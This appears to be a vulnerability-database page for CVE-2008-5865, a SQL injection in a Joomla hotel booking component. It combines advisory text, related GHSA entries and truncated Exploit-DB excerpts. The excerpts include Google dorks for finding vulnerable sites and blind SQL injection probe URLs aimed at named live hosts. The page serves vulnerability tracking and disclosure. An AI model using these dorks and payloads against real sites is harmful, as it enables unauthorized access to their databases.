CVE-2008-5865
published 2009-01-06CVE-2008-5865: SQL injection vulnerability in the com_hbssearch component 1.0 in the Hotel Booking Reservation System (aka HBS) 1.0.0 for Joomla! allows remote attackers to…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.01%
58.8th percentile
SQL injection vulnerability in the com_hbssearch component 1.0 in the Hotel Booking Reservation System (aka HBS) 1.0.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the r_type parameter in a showhoteldetails action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlahbs | hotel_booking_reservation_system | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-hq84-pvgw-424h: SQL injection vulnerability in the com_hbssearch component 1
ghsa_unreviewed·2022-05-17
CVE-2008-5865 [HIGH] CWE-89 GHSA-hq84-pvgw-424h: SQL injection vulnerability in the com_hbssearch component 1
SQL injection vulnerability in the com_hbssearch component 1.0 in the Hotel Booking Reservation System (aka HBS) 1.0.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the r_type parameter in a showhoteldetails action to index.php.
GHSA
GHSA-p29x-jjv6-hfrh: Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS or com_hbssearch) component for Joomla! allow remote attackers
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2009-3357 [HIGH] CWE-89 GHSA-p29x-jjv6-hfrh: Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS or com_hbssearch) component for Joomla! allow remote attackers
Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS or com_hbssearch) component for Joomla! allow remote attackers to execute arbitrary SQL commands via the (1) h_id, (2) id, and (3) rid parameters to longDesc.php, and the h_id parameter to (4) detail.php, (5) detail1.php, (6) detail2.php, (7) detail3.php, (8) detail4.php, (9) detail5.php, (10) detail6.php, (11) detail7.php, and (12) detail8.php, different vectors than CVE-2008-5865, CVE-2008-5874, and CVE-2008-5875.
No detection rules found.
Exploit-DB
Joomla! Component 5starhotels - SQL Injection
exploitdb·2008-12-24
CVE-2008-5875 Joomla! Component 5starhotels - SQL Injection
Joomla! Component 5starhotels - SQL Injection
---
#!/usr/bin/perl -w
#Joomla com_5starhotels Sql injection#
########################################
#[~] Author : EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label TURK Godlike Nitrous
#[!] Module_Name: com_5starhotels
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_5starhotels"
########################################
system("color FF0000");
system("Nohacking");
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t| Turkish Securtiy Team |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t|Joomla Module com_5starhotels(showhoteldetails&id=)Remote SQL Injection Vuln|\n\n";
print "\t\t| Coded by: EcHoLL www.warezturk.org |\n\
Exploit-DB
Joomla! Component com_lowcosthotels - Blind SQL Injection
exploitdb·2008-12-23
CVE-2008-5875 Joomla! Component com_lowcosthotels - Blind SQL Injection
Joomla! Component com_lowcosthotels - Blind SQL Injection
---
Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.joomlahbs.com/
DorK : inurl:index.php?option=com_lowcosthotels
Demo :
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
or
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@
Exploit-DB
Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection
exploitdb·2008-12-21
CVE-2008-5865 Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection
Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection
---
#############################################################
Joomla Component com_tophotelmodule(id) Blind SQL-injection
#############################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Top Hotel Module
#[!] 06/07/2008
#[!] Joomla HBS
#[!] [email protected]
#[!] http://joomlahbs.com
#[!] 1.0.0
###################################################
Example:
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=[SQL-vulnerability]
LiveDEMO:
http://demo.joomlahbs.com/p2/index.php?option
Exploit-DB
Joomla! Component com_hbssearch 1.0 - Blind SQL Injection
exploitdb·2008-12-21
CVE-2008-5865 Joomla! Component com_hbssearch 1.0 - Blind SQL Injection
Joomla! Component com_hbssearch 1.0 - Blind SQL Injection
---
#############################################################
Joomla Component com_hbssearch(r_type) Blind SQL-injection
#############################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Joomla HBS
#[!] Administrator
#[!] [email protected]
#[!] http://joomlahbs.com
#[!] 1.0.0
###################################################
Example:
http://localhost/Path/index.php?option=com_hbssearch&task=showhoteldetails&id=1&r_type=[SQL-vulnerability]
LiveDEMO:
http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhote
No writeups or analysis indexed.
http://secunia.com/advisories/33215http://securityreason.com/securityalert/4870http://www.securityfocus.com/bid/32951https://exchange.xforce.ibmcloud.com/vulnerabilities/47539https://www.exploit-db.com/exploits/7538http://secunia.com/advisories/33215http://securityreason.com/securityalert/4870http://www.securityfocus.com/bid/32951https://exchange.xforce.ibmcloud.com/vulnerabilities/47539https://www.exploit-db.com/exploits/7538
2009-01-06
Published